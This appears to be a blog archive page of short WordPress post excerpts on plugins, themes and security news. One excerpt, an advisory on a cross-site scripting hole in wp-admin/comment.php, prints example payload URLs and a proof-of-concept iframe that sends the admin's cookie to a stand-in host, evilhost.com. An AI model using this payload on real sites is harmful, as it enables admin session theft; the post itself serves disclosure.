Feeder is an advanced RSS feed aggregator plugin for WordPress blogs by my good friend Subbu. By using feeder, you can easily display feeds from any website or blog. Feeder currently works well with WordPress 2.1 blogs.
Unique thing about Feeder is that, it can cache the given feed on your server. As Directly accessing […]

Many people have asked me what plugins I use in TechnoBeta. To tell you the truth, its not just TechnoBeta, but whatever plugin I use, I use it for all my sites.
I have made a list of all the plugins that I use along with the link from where you can download them. Feel free […]

The guys at WordPress have issued an alert to all users who downloaded WordPress 2.1.1 in the past 3-4 days to upgrade immediately.
The statement comes after a hacker had gained access to one of WP’s servers and had managed to change the original WP code. The malicious copy, has been termed highly dangerous and can […]

A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width=”0″ height=”0″ src=”http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27″></iframe>
Solution:

Not exactly a spy, but “Live”. This WordPress plugin lets you watch your website activity in real time. You can watch what people are doing on your site - which page they are visiting, are they leaving comments, or are they grabbing your feeds.
Each page hit, RSS hit, and comment slowly scrolls onto a canvas. […]

Good news for WordPress.com blog owners, you can now add a ‘Digg It’ button to all your posts and let others Digg your story. That means no more tinkering with HTML or copy-pasting codes into each post.
Before you get excited and rush to your WordPress blogs, hold on - there’s a catch.

I’ve been seeing a lot of buzz about the Blogger and WordPress blogging platforms recently, and being a WordPress fan that I am, I decided to push people into accepting WordPress as their medium of blogging. Sure, there are plenty of reasons why WordPress wins hands down against Blogger, but I won’t get into detail about that now.
So […]

Ever imagined how a Command Line Interface theme for WordPress would look like? Here’s your chance, Rod McFarland has created a WordPress theme which is navigated using commands through a CLI.

After the wp-admin/templates.php exploit, its now the turn of the /wp-trackback.php file to be exploited! Rgod has released a new exploit for Wordpress 2.0.6 and previous.
The exploit uses global variables in “/wp-trackback.php”. The exploit can be used only if the “register_globals” variable on the host PHP server is on (e.g. “/etc/php.ini” has “register globals=on”) and the Trackbacks […]

Looking forward to WordPress 2.1 like the rest of us? Well, Lorelle has a list that shows whats new in the soon to be released WordPress 2.1.To begin with, here are some of the new features that are going to be implemented in WordPress 2.1:

Custom Image Header API which will allow easier handling of adding […]